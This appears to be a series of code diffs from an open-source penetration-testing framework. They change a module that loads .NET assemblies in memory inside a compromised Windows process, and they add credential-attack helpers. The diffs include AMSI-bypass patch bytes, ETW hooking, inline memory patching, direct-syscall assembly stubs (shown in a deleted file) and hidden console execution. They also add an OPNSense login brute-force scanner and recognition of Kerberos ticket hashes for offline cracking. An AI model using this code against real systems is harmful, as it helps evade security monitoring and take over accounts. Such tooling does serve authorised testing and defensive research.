+EXTERN_C NTSTATUS ZwReadVirtualMemory10_1(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
+EXTERN_C NTSTATUS ZwProtectVirtualMemory10_2(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
+EXTERN_C NTSTATUS ZwReadVirtualMemory10_2(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
+EXTERN_C NTSTATUS ZwProtectVirtualMemory10_3(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
+EXTERN_C NTSTATUS ZwReadVirtualMemory10_3(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
+EXTERN_C NTSTATUS ZwProtectVirtualMemory10_4(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
+EXTERN_C NTSTATUS ZwReadVirtualMemory10_4(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
+#endif
 EXTERN_C NTSTATUS ZwWriteVirtualMemory10(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToWrite, PSIZE_T NumberOfBytesWritten);

-NTSTATUS(*ZwProtectVirtualMemory)(
-	IN HANDLE ProcessHandle,
-	IN PVOID* BaseAddress,
-	IN SIZE_T* NumberOfBytesToProtect,
-	IN ULONG NewAccessProtection,
-	OUT PULONG OldAccessProtection
-	);
-
-NTSTATUS(*ZwReadVirtualMemory)(
-	HANDLE hProcess,
-	PVOID lpBaseAddress,
-	PVOID lpBuffer,
-	SIZE_T NumberOfBytesToRead,
-	PSIZE_T NumberOfBytesRead
-	);
-
-NTSTATUS(*ZwWriteVirtualMemory)(
-	HANDLE hProcess,
-	PVOID lpBaseAddress,
-	PVOID lpBuffer,
-	SIZE_T NumberOfBytesToWrite,
-	PSIZE_T NumberOfBytesWritten
-	);
+pNtProtectVirtualMemory ZwProtectVirtualMemory;
+pNtWriteVirtualMemory ZwWriteVirtualMemory;
+pNtReadVirtualMemory ZwReadVirtualMemory;

 ULONG NTAPI MyEtwEventWrite(
 	__in REGHANDLE RegHandle,
@@ -29,11 +29,9 @@ unsigned char uHook[] = {

 #ifdef _X32
 unsigned char amsipatch[] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
-SIZE_T patchsize = 8;
 #endif
 #ifdef _X64
 unsigned char amsipatch[] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
-SIZE_T patchsize = 6;
 #endif

 struct Metadata
@@ -62,11 +60,13 @@ int executeSharp(LPVOID lpPayload)
 	_AssemblyPtr pAssembly = NULL;
 	SAFEARRAYBOUND rgsabound[1];
 	_MethodInfoPtr pMethodInfo = NULL;
+	SAFEARRAY* pSafeArray = NULL;
 	VARIANT retVal;
 	VARIANT obj;
-	SAFEARRAY* psaStaticMethodArgs;
-	SAFEARRAY* psaEntryPointParameters;
+	SAFEARRAY* psaStaticMethodArgs = NULL;
+	SAFEARRAY* psaEntryPointParameters = NULL;
 	VARIANT vtPsa;
+	HANDLE pipe = NULL;

 	char* pipeName = NULL;
 	char* appdomainName = NULL;
@@ -106,7 +106,8 @@ int executeSharp(LPVOID lpPayload)

 	// Convert to wchar
 	clrVersion_w = new wchar_t[metadata.clrVersionLength + 1];
-	mbstowcs(clrVersion_w, clrVersion, metadata.clrVersionLength + 1);
+	size_t converted= 0;
+	mbstowcs_s(&converted, clrVersion_w, metadata.clrVersionLength + 1, clrVersion, metadata.clrVersionLength + 1);
 	
 	arg_s = (unsigned char*)malloc(metadata.argsSize * sizeof(BYTE));;
 	memcpy(arg_s, data_ptr, metadata.argsSize);
@@ -115,7 +116,7 @@ int executeSharp(LPVOID lpPayload)
 	////////////////// Hijack stdout

 	// Create a pipe to send data
-	HANDLE pipe = CreateNamedPipeA(
+	pipe = CreateNamedPipeA(
 		pipeName, // name of the pipe
 		PIPE_ACCESS_OUTBOUND, // 1-way pipe -- send only
 		PIPE_TYPE_BYTE, // send data as a message stream
@@ -147,7 +148,7 @@ int executeSharp(LPVOID lpPayload)

 	rgsabound[0].cElements = metadata.assemblySize;
 	rgsabound[0].lLbound = 0;
-	SAFEARRAY* pSafeArray = SafeArrayCreate(VT_UI1, 1, rgsabound);
+	pSafeArray = SafeArrayCreate(VT_UI1, 1, rgsabound);

 	void* pvData = NULL;
 	hr = SafeArrayAccessData(pSafeArray, &pvData);
@@ -245,7 +246,7 @@ int executeSharp(LPVOID lpPayload)

 	// Convert to wchar
 	appdomainName_w = new wchar_t[metadata.appdomainLength+1];
-	mbstowcs(appdomainName_w, appdomainName, metadata.appdomainLength+1);
+	mbstowcs_s(&converted, appdomainName_w, metadata.appdomainLength + 1, appdomainName, metadata.appdomainLength + 1);

 	hr = pRuntimeHost->CreateDomain(appdomainName_w, NULL, &pAppDomainThunk);

@@ -344,7 +345,7 @@ int executeSharp(LPVOID lpPayload)
 		wtext[1] = L' '; // Separator


-		mbstowcs(wtext+2, (char*)arg_s, metadata.argsSize);
+		mbstowcs_s(&converted, wtext+2, metadata.argsSize, (char*)arg_s, metadata.argsSize);
 		szArglist = CommandLineToArgvW(wtext, &nArgs);

 		free(wtext);
@@ -353,12 +354,11 @@ int executeSharp(LPVOID lpPayload)

 		for (long i = 1; i < nArgs; i++) // Start a 1 - ignoring the fake process name
 		{
-			size_t converted;
 			size_t strlength = wcslen(szArglist[i]) + 1;
 			OLECHAR* sOleText1 = new OLECHAR[strlength];
 			char* buffer = (char*)malloc(strlength * sizeof(char));

-			wcstombs(buffer, szArglist[i], strlength);
+			wcstombs_s(&converted, buffer, strlength, szArglist[i], strlength);

 			mbstowcs_s(&converted, sOleText1, strlength, buffer, strlength);
 			BSTR strParam1 = SysAllocString(sOleText1);
@@ -388,9 +388,11 @@ int executeSharp(LPVOID lpPayload)

 Cleanup:

-	FlushFileBuffers(pipe);
-	DisconnectNamedPipe(pipe);
-	CloseHandle(pipe);
+	if (pipe != NULL) {
+		FlushFileBuffers(pipe);
+		DisconnectNamedPipe(pipe);
+		CloseHandle(pipe);
+	}

 	if (pEnumerator) {
 		pEnumerator->Release();
@@ -445,7 +447,9 @@ VOID Execute(LPVOID lpPayload)
 		AllocConsole();
 		HWND wnd = GetConsoleWindow();
 		if (wnd)
+		{
 			ShowWindow(wnd, SW_HIDE);
+		}
 	}

 	HANDLE stdOut = GetStdHandle(STD_OUTPUT_HANDLE);
@@ -458,40 +462,9 @@ VOID Execute(LPVOID lpPayload)
 }

 INT InlinePatch(LPVOID lpFuncAddress, UCHAR* patch, int patchsize) {
-	PNT_TIB pTIB = NULL;
-	PTEB pTEB = NULL;
-	PPEB pPEB = NULL;
-
-	// Get pointer to the TEB
-	pTIB = (PNT_TIB)__readgsqword(0x30);
-	pTEB = (PTEB)pTIB->Self;
-
-	// Get pointer to the PEB
-	pPEB = (PPEB)pTEB->ProcessEnvironmentBlock;
-	if (pPEB == NULL) {
-		return -1;
-	}
-
-	if (pPEB->OSMajorVersion == 10 && pPEB->OSMinorVersion == 0) {
-		ZwProtectVirtualMemory = &ZwProtectVirtualMemory10;
-		ZwWriteVirtualMemory = &ZwWriteVirtualMemory10;
-	}
-	else if (pPEB->OSMajorVersion == 6 && pPEB->OSMinorVersion == 1 && pPEB->OSBuildNumber == 7601) {
-		ZwProtectVirtualMemory = &ZwProtectVirtualMemory7SP1;
-		ZwWriteVirtualMemory = &ZwWriteVirtualMemory7SP1;
-	}
-	else if (pPEB->OSMajorVersion == 6 && pPEB->OSMinorVersion == 2) {
-		ZwProtectVirtualMemory = &ZwProtectVirtualMemory80;
-		ZwWriteVirtualMemory = &ZwWriteVirtualMemory80;
-	}
-	else if (pPEB->OSMajorVersion == 6 && pPEB->OSMinorVersion == 3) {
-		ZwProtectVirtualMemory = &ZwProtectVirtualMemory81;
-		ZwWriteVirtualMemory = &ZwWriteVirtualMemory81;
-	}
-	else {
-
-		return -2;
-	}
+	HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
+	ZwProtectVirtualMemory = (pNtProtectVirtualMemory)GetProcAddress(hNtdll, "NtProtectVirtualMemory");
+	ZwWriteVirtualMemory = (pNtWriteVirtualMemory)GetProcAddress(hNtdll, "NtWriteVirtualMemory");

 	LPVOID lpBaseAddress = lpFuncAddress;
 	ULONG OldProtection, NewProtection;
@@ -555,13 +528,13 @@ BOOL PatchAmsi(HANDLE pipe)
 BOOL ClrIsLoaded(LPCWSTR version, IEnumUnknown* pEnumerator, LPVOID* pRuntimeInfo) {
 	HRESULT hr;
 	ULONG fetched = 0;
-	DWORD vbSize;
+	DWORD vbSize = 260;
 	BOOL retval = FALSE;
 	wchar_t currentversion[260];

-	while (SUCCEEDED(pEnumerator->Next(1, (IUnknown**)&pRuntimeInfo, &fetched)) && fetched > 0)
+	while (SUCCEEDED(pEnumerator->Next(1, (IUnknown**)pRuntimeInfo, &fetched)) && fetched > 0)
 	{
-		hr = ((ICLRRuntimeInfo*)pRuntimeInfo)->GetVersionString(currentversion, &vbSize);
+		hr = ((ICLRRuntimeInfo*)*pRuntimeInfo)->GetVersionString(currentversion, &vbSize);
 		if (!FAILED(hr))
 		{
 			if (wcscmp(currentversion, version) == 0)
@@ -570,7 +543,7 @@ BOOL ClrIsLoaded(LPCWSTR version, IEnumUnknown* pEnumerator, LPVOID* pRuntimeInf
 				break;
 			}
 		}
-		((ICLRRuntimeInfo*)pRuntimeInfo)->Release();
+		((ICLRRuntimeInfo*)*pRuntimeInfo)->Release();
 	}

 	return retval;
@@ -19,5 +19,5 @@ using namespace mscorlib;
 VOID Execute(LPVOID lpPayload);
 BOOL FindVersion(void * assembly, int length);
 BOOL PatchAmsi(HANDLE pipe);
-BOOL ClrIsLoaded(LPCWSTR versione, IEnumUnknown* pEnumerator, LPVOID * pRuntimeInfo);
+BOOL ClrIsLoaded(LPCWSTR versione, IEnumUnknown* pEnumerator, LPVOID* pRuntimeInfo);
 INT InlinePatch(LPVOID lpFuncAddress, UCHAR * patch, int patchsize);
@@ -79,11 +79,13 @@
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
    <LinkIncremental>false</LinkIncremental>
    <TargetName>$(ProjectName)$(Platform)</TargetName>
+    <OutDir>..\..\..\..\data\post\execute-dotnet-assembly\</OutDir>
+    <IntDir>$(Configuration)\</IntDir>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <LinkIncremental>false</LinkIncremental>
    <TargetName>$(ProjectName)$(Platform)</TargetName>
-    <OutDir>..\..\..\..\data\post\execute-dotnet-assembly</OutDir>
+    <OutDir>..\..\..\..\data\post\execute-dotnet-assembly\</OutDir>
  </PropertyGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
    <ClCompile>
@@ -111,25 +113,30 @@
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
+      <WarningLevel>Level4</WarningLevel>
      <PrecompiledHeader>Use</PrecompiledHeader>
      <Optimization>MaxSpeed</Optimization>
      <FunctionLevelLinking>true</FunctionLevelLinking>
      <IntrinsicFunctions>true</IntrinsicFunctions>
      <PreprocessorDefinitions>_X32;WIN32;NDEBUG;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <BufferSecurityCheck>true</BufferSecurityCheck>
+      <TreatWarningAsError>true</TreatWarningAsError>
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
      <GenerateDebugInformation>false</GenerateDebugInformation>
      <EnableCOMDATFolding>true</EnableCOMDATFolding>
      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalLibraryDirectories>C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\lib\amd64</AdditionalLibraryDirectories>
+      <AdditionalLibraryDirectories>C:\Program Files %28x86%29\Microsoft Visual Studio 14.0\VC\lib</AdditionalLibraryDirectories>
+      <AdditionalDependencies>libucrt.lib;
+libvcruntime.lib;libcmt.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers>
    </Link>
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
+      <WarningLevel>Level4</WarningLevel>
      <PrecompiledHeader>Use</PrecompiledHeader>
      <Optimization>MaxSpeed</Optimization>
      <FunctionLevelLinking>true</FunctionLevelLinking>
@@ -137,6 +144,7 @@
      <PreprocessorDefinitions>_X64;WIN32;NDEBUG;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
      <CompileAs>Default</CompileAs>
+      <TreatWarningAsError>true</TreatWarningAsError>
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
@@ -167,12 +175,6 @@
      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
    </ClCompile>
  </ItemGroup>
-  <ItemGroup>
-    <MASM Include="Syscalls.asm">
-      <FileType>Document</FileType>
-      <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</ExcludedFromBuild>
-    </MASM>
-  </ItemGroup>
  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
  <ImportGroup Label="ExtensionTargets">
    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
@@ -55,7 +55,10 @@
    </ClCompile>
  </ItemGroup>
  <ItemGroup>
-    <MASM Include="Syscalls.asm">
+    <MASM Include="Syscalls_32.asm">
+      <Filter>Sources</Filter>
+    </MASM>
+    <MASM Include="Syscalls_64.asm">
      <Filter>Sources</Filter>
    </MASM>
  </ItemGroup>
@@ -3,7 +3,7 @@
 #include <Windows.h>

 typedef NTSTATUS
-(*NtQueueApcThread)(
+(NTAPI *NtQueueApcThread)(
    HANDLE    ThreadHandle,
    PVOID     ApcRoutine,
    ULONG_PTR SystemArgument1,
@@ -11,7 +11,6 @@ typedef NTSTATUS
    ULONG_PTR SystemArgument3
    );

-
 VOID ReflectiveFree(HINSTANCE hAppInstance) {
    NtQueueApcThread pNtQueueApcThread = (NtQueueApcThread)GetProcAddress(GetModuleHandle(TEXT("ntdll")), "NtQueueApcThread");
    HANDLE hThread = NULL;
@@ -28,20 +27,30 @@ VOID ReflectiveFree(HINSTANCE hAppInstance) {
        // open a real handle to this thread to pass in the APC so it operates on this thread and not itself
        hThisThread = OpenThread(THREAD_QUERY_INFORMATION | SYNCHRONIZE, FALSE, GetCurrentThreadId());
        if (!hThisThread)
+        {
            break;
+        }
+
+
+        // The other thread will:
+        // - Wait for us: WaitForSingleObjectEx(hThisThread, INFINITE, FALSE);
+        // - Close the handle we opened: CloseHandle(hThisThread);
+        // - Free the memory: VirtualFree(hAppInstance, 0, MEM_RELEASE);

        // tell that thread to wait on this thread, ensures VirtualFree isn't called until this thread has exited
        NTSTATUS status = pNtQueueApcThread(hThread, WaitForSingleObjectEx, (ULONG_PTR)hThisThread, INFINITE, FALSE);

        // then close the handle so it's not leaked
-        DWORD result = QueueUserAPC((PAPCFUNC)CloseHandle, hThread, (ULONG_PTR)hThisThread);
+        QueueUserAPC((PAPCFUNC)CloseHandle, hThread, (ULONG_PTR)hThisThread);
        // then free the memory
        status = pNtQueueApcThread(hThread, VirtualFree, (ULONG_PTR)hAppInstance, 0, MEM_RELEASE);
        ResumeThread(hThread);
    } while (FALSE);

    if (hThread)
+    {
        CloseHandle(hThread);
+    }
 }

 VOID ReflectiveFreeAndExitThread(HINSTANCE hAppInstance, DWORD dwExitCode) {
@@ -1,97 +0,0 @@
-.code
-
-; Reference: https://j00ru.vexillium.org/syscalls/nt/64/
-
-; Windows 7 SP1 / Server 2008 R2 specific syscalls
-
-ZwProtectVirtualMemory7SP1 proc
-		mov r10, rcx
-		mov eax, 4Dh
-		syscall
-		ret
-ZwProtectVirtualMemory7SP1 endp
-
-ZwWriteVirtualMemory7SP1 proc
-		mov r10, rcx
-		mov eax, 37h
-		syscall
-		ret
-ZwWriteVirtualMemory7SP1 endp
-
-ZwReadVirtualMemory7SP1 proc
-		mov r10, rcx
-		mov eax, 3Ch
-		syscall
-		ret
-ZwReadVirtualMemory7SP1 endp
-
-; Windows 8 / Server 2012 specific syscalls
-
-ZwProtectVirtualMemory80 proc
-		mov r10, rcx
-		mov eax, 4Eh
-		syscall
-		ret
-ZwProtectVirtualMemory80 endp
-
-ZwWriteVirtualMemory80 proc
-		mov r10, rcx
-		mov eax, 38h
-		syscall
-		ret
-ZwWriteVirtualMemory80 endp
-
-ZwReadVirtualMemory80 proc
-		mov r10, rcx
-		mov eax, 3Dh
-		syscall
-		ret
-ZwReadVirtualMemory80 endp
-
-; Windows 8.1 / Server 2012 R2 specific syscalls
-
-ZwProtectVirtualMemory81 proc
-		mov r10, rcx
-		mov eax, 4Fh
-		syscall
-		ret
-ZwProtectVirtualMemory81 endp
-
-ZwWriteVirtualMemory81 proc
-		mov r10, rcx
-		mov eax, 39h
-		syscall
-		ret
-ZwWriteVirtualMemory81 endp
-
-ZwReadVirtualMemory81 proc
-		mov r10, rcx
-		mov eax, 3Eh
-		syscall
-		ret
-ZwReadVirtualMemory81 endp
-
-; Windows 10 / Server 2016 specific syscalls
- 
-ZwProtectVirtualMemory10 proc
-		mov r10, rcx
-		mov eax, 50h
-		syscall
-		ret
-ZwProtectVirtualMemory10 endp
-
-ZwWriteVirtualMemory10 proc
-		mov r10, rcx
-		mov eax, 3Ah
-		syscall
-		ret
-ZwWriteVirtualMemory10 endp
-
-ZwReadVirtualMemory10 proc
-		mov r10, rcx
-		mov eax, 3Fh
-		syscall
-		ret
-ZwReadVirtualMemory10 endp
-
-end
@@ -3,7 +3,7 @@ IF "%VCINSTALLDIR%" == "" GOTO NEED_VS

 IF "%1"=="X64" GOTO BUILD_X64

-ECHO "Building HostingCLR x64 (Release)"
+ECHO "Building HostingCLR All Platforms (Release)"
 SET PLAT=all
 GOTO RUN

@@ -4,8 +4,12 @@
    <SolutionPath>.\HostingCLR.sln</SolutionPath>
  </PropertyGroup>

-  <Target Name="all" DependsOnTargets="x64" />
+  <Target Name="all" DependsOnTargets="x64;Win32" />

+  <Target Name="Win32">
+    <Message Text="Building HostingCLR x86 Release version" />
+    <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
+  </Target>
  <Target Name="x64">
    <Message Text="Building HostingCLR x64 Release version" />
    <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
@@ -191,13 +191,15 @@ module Anemone
      url.scheme == "https",
      @opts[:ssl_version],
      @opts[:proxies],
-                    @opts[:username],
-                    @opts[:password]
+      @opts[:username],
+      @opts[:password],
+      subscriber: @opts[:http_subscriber]
    )

    conn.set_config(
      'vhost'      => virtual_host(url),
      'agent'      => user_agent,
+      'ssl_server_name_indication' => @opts[:ssl_server_name_indication],
      'domain'     => @opts[:domain]
    )

@@ -128,6 +128,14 @@ module Metasploit
          return 'pbkdf2-sha256'
        when hash =~ /^\$sntp-ms\$[\da-fA-F]{32}\$[\da-fA-F]{96}$/
          return 'timeroast'
+        when hash =~ /^\$krb5tgs\$23\$\*.+\$[\da-fA-F]{32}\$[\da-fA-F]+$/
+          return 'krb5tgs-rc4'
+        when hash =~ /^\$krb5tgs\$18\$.+\$[\da-fA-F]{24}\$[\da-fA-F]+$/
+          return 'krb5tgs-aes256'
+        when hash =~ /^\$krb5tgs\$17\$.+\$[\da-fA-F]{24}\$[\da-fA-F]+$/
+          return 'krb5tgs-aes128'
+        when hash =~ /^\$krb5asrep\$23\$[^:]+:[\da-fA-F]{32}\$[\da-fA-F]+$/
+          return 'krb5asrep-rc4'
        end
        ''
      end
@@ -45,6 +45,9 @@ module Metasploit
          # @!attribute bruteforce_speed
          #   @return [Integer] The desired speed, with 5 being 'fast' and 0 being 'slow.'
          attr_accessor :bruteforce_speed
+          # @!attribute sslkeylogfile
+          #   @return [String] The SSL key log file path
+          attr_accessor :sslkeylogfile

          validates :connection_timeout,
                    presence: true,
@@ -87,8 +87,11 @@ module Metasploit
            # It doesn't appear to be documented anywhere, but Microsoft gives us a bit
            # of extra information in the e-data section
            begin
-              pa_data_entry = krb_err.res.e_data_as_pa_data_entry
-              if pa_data_entry && pa_data_entry.type == Rex::Proto::Kerberos::Model::PreAuthType::PA_PW_SALT
+              pa_data_entry = krb_err.res.e_data_as_pa_data.find do |pa_data|
+                pa_data.type == Rex::Proto::Kerberos::Model::PreAuthType::PA_PW_SALT
+              end
+
+              if pa_data_entry
                pw_salt = pa_data_entry.decoded_value
                if pw_salt.nt_status
                  case pw_salt.nt_status.value
@@ -107,7 +110,7 @@ module Metasploit
                  Metasploit::Model::Login::Status::DISABLED
                end
              else
-                  Metasploit::Model::Login::Status::DISABLED
+                Metasploit::Model::Login::Status::DISABLED
              end
            rescue Rex::Proto::Kerberos::Model::Error::KerberosDecodingError
              # Could be a non-MS implementation?
@@ -77,7 +77,7 @@ module Metasploit
          }

          begin
-            client = Rex::Proto::MSSQL::Client.new(framework_module, framework, host, port, proxies)
+            client = Rex::Proto::MSSQL::Client.new(framework_module, framework, host, port, proxies, sslkeylogfile: sslkeylogfile)
            if client.mssql_login(credential.public, credential.private, '', credential.realm)
              result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
              if use_client_as_proof
@@ -0,0 +1,138 @@
+require 'metasploit/framework/login_scanner/http'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # This is the LoginScanner class for dealing with Deciso B.V. OPNSense instances.
+      # It is responsible for taking a single target, and a list of credentials
+      # and attempting them. It then saves the results.
+      class OPNSense < HTTP
+
+        # Retrieve the wanted cookie value by name from the HTTP response.
+        #
+        # @param [Rex::Proto::Http::Response] response The response from which to extract cookie values
+        # @param [String] wanted_cookie_name The cookie name for which to get the value
+        def get_cookie_value(response, wanted_cookie_name)
+          response.get_cookies.split('; ').find { |cookie| cookie.start_with?(wanted_cookie_name) }.split('=').last
+        end
+
+        # Checks if the target is OPNSense. The login module should call this.
+        #
+        # @return [Boolean, String] FalseClass if target is OPNSense, otherwise String
+        def check_setup
+          request_params = {
+            'method' => 'GET',
+            'uri' => normalize_uri(@uri.to_s)
+          }
+          res = send_request(request_params)
+
+          if res && res.code == 200 && res.body&.include?('Login | OPNsense')
+            return false
+          end
+
+          "Unable to locate \"Login | OPNsense\" in body. (Is this really OPNSense?)"
+        end
+
+        # Query the magic value and cookies from the OPNSense login page.
+        #
+        # @return [Hash<Symbol, Object>] A hash of the status and error or result.
+        def query_magic_value_and_cookies
+          request_params = {
+            'method' => 'GET',
+            'uri' => normalize_uri(@uri.to_s)
+          }
+
+          res = send_request(request_params)
+
+          if res.nil?
+            return { status: :failure, error: 'Did not receive response to a GET request' }
+          end
+
+          if res.code != 200
+            return { status: :failure, error: "Unexpected return code from GET request - #{res.code}" }
+          end
+
+          if res.body.nil?
+            return { status: :failure, error: 'Received an empty body from GET request' }
+          end
+
+          # The magic name and value are hidden on the login form, so we extract them using get_html_document
+          form_input = res.get_html_document&.at('input')
+
+          if form_input.nil? || form_input['type'] != 'hidden'
+            return { status: :failure, error: 'Could not find hidden magic field in the login form.' }
+          end
+
+          magic_value = { name: form_input['name'], value: form_input['value'] }
+          cookies = "PHPSESSID=#{get_cookie_value(res, 'PHPSESSID')}; cookie_test=#{get_cookie_value(res, 'cookie_test')}"
+          { status: :success, result: { magic_value: magic_value, cookies: cookies } }
+        end
+
+        # Each individual login needs their own magic name and value.
+        # This magic value comes from the login form received in response to a GET request to the login page.
+        # Each login attempt also requires specific cookies to be set, otherwise an error is returned.
+        #
+        # @param username Username
+        # @param password Password
+        # @param magic_value A hash containing the magic_value name and value
+        # @param cookies A cookie string
+        def try_login(username, password, magic_value, cookies)
+          request_params =
+            {
+              'method' => 'POST',
+              'uri' => normalize_uri(@uri.to_s),
+              'cookie' => cookies,
+              'vars_post' => {
+                magic_value[:name] => magic_value[:value],
+                'usernamefld' => username,
+                'passwordfld' => password,
+                'login' => '1'
+              }
+            }
+
+          { status: :success, result: send_request(request_params) }
+        end
+
+        def attempt_login(credential)
+          result_options = {
+            credential:   credential,
+            host:         @host,
+            port:         @port,
+            protocol:     'tcp',
+            service_name: 'opnsense'
+          }
+
+          # Each login needs its own magic name and value
+          magic_value_and_cookies = query_magic_value_and_cookies
+
+          if magic_value_and_cookies[:status] != :success
+            result_options.merge!(status: ::Metasploit::Model::Login::Status::UNTRIED, proof: magic_value_and_cookies[:error])
+            return Result.new(result_options)
+          end
+
+          login_result = try_login(credential.public, credential.private, magic_value_and_cookies[:result][:magic_value], magic_value_and_cookies[:result][:cookies])
+
+          if login_result[:result].nil?
+            result_options.merge!(status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: 'Unable to connect to OPNSense')
+            return Result.new(result_options)
+          end
+
+          # 200 is incorrect result
+          if login_result[:result].code == 200 || login_result[:result].body.include?('Username or Password incorrect')
+            result_options.merge!(status: ::Metasploit::Model::Login::Status::INCORRECT, proof: 'Username or Password incorrect')
+            return Result.new(result_options)
+          end
+
+          login_status = login_result[:result].code == 302 ? ::Metasploit::Model::Login::Status::SUCCESSFUL : ::Metasploit::Model::Login::Status::INCORRECT
+          result_options.merge!(status: login_status, proof: login_result[:result])
+          Result.new(result_options)
+
+        rescue ::Rex::ConnectionError => _e
+          result_options.merge!(status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: 'Unable to connect to OPNSense')
+          return Result.new(result_options)
+        end
+      end
+    end
+  end
+end
@@ -38,8 +38,9 @@ class TDSSSLProxy
  TYPE_PRE_LOGIN_MESSAGE = 18
  STATUS_END_OF_MESSAGE = 0x01

-  def initialize(sock)
+  def initialize(sock, sslkeylogfile: nil)
    @tdssock = sock
+    @sslkeylogfile = sslkeylogfile
    @s1, @s2 = Rex::Socket.tcp_socket_pair
  end

@@ -48,10 +49,27 @@ class TDSSSLProxy
    @t1.join
  end

+  def write_to_keylog_file(ctx, sslkeylogfile)
+    # writing to the sslkeylogfile is required, it adds support for network capture decryption which is useful to
+    # decrypt TLS traffic in wireshark
+    if sslkeylogfile
+      unless ctx.respond_to?(:keylog_cb)
+        raise 'Unable to create sslkeylogfile - Ruby 3.2 or above required for this functionality'
+      end
+
+      ctx.keylog_cb = proc do |_sock, line|
+        File.open(sslkeylogfile, 'ab') do |file|
+          file.write("#{line}\n")
+        end
+      end
+    end
+  end
+
  def setup_ssl
    @running = true
    @t1 = Thread.start { ssl_setup_thread }
    ctx = OpenSSL::SSL::SSLContext.new(:SSLv23)
+    write_to_keylog_file(ctx, @sslkeylogfile)
    ctx.ciphers = "ALL:!ADH:!EXPORT:!SSLv2:!SSLv3:+HIGH:+MEDIUM"
    @ssl_socket = OpenSSL::SSL::SSLSocket.new(@s1, ctx)
    @ssl_socket.connect
@@ -128,7 +128,7 @@ module Metasploit
        def get_hash_history(data)
          raw_history = data.slice!(0,HASH_HISTORY_SIZE)
          split_history = raw_history.scan(/.{1,33}/)
-          split_history.map!{ |hash| hash.gsub(/\x00/,'')}
+          split_history.map!{ |hash| hash.gsub("\x00",'')}
          split_history.reject!{ |hash| hash.blank? }
        end

@@ -137,7 +137,7 @@ module Metasploit
        end

        def get_string(data,length)
-          data.slice!(0,length).force_encoding("UTF-8").gsub(/\x00/,'')
+          data.slice!(0,length).force_encoding("UTF-8").gsub("\x00",'')
        end

        def uac_string
@@ -133,6 +133,8 @@ module Metasploit
                nil
              when /^krb5$/
                return "#{cred.id}:#{cred.private.data}"
+              when /^(krb5.|timeroast$)/
+                return cred.private.data
              end
            end
            nil
@@ -78,6 +78,8 @@ module Metasploit
              when /vnc/
                # add a beginning * if one is missing
                return "$vnc$#{cred.private.data.start_with?('*') ? cred.private.data.upcase : "*#{cred.private.data.upcase}"}"
+              when /^(krb5.|timeroast$)/
+                return cred.private.data
              else
                # /mysql|mysql-sha1/
                # /mssql|mssql05|mssql12/
@@ -52,7 +52,7 @@ module Metasploit
                info = info.map { |item| item.strip }
                info = info.join(', ').to_s
                # Windows
-              elsif info =~ /command not found|is not recognized as an internal or external command/
+              elsif info =~ /command not found|is not recognized as an internal or external command|is not recognized as the name of a cmdlet, function, script file, or operable/
                info = ssh_socket.exec!("systeminfo\n").to_s
                /OS Name:\s+(?<os_name>.+)$/ =~ info
                /OS Version:\s+(?<os_num>.+)$/ =~ info
@@ -89,6 +89,7 @@ module Metasploit
              'SSL'           =>  dossl,
              'SSLVersion'    =>  opts['SSLVersion'] || ssl_version,
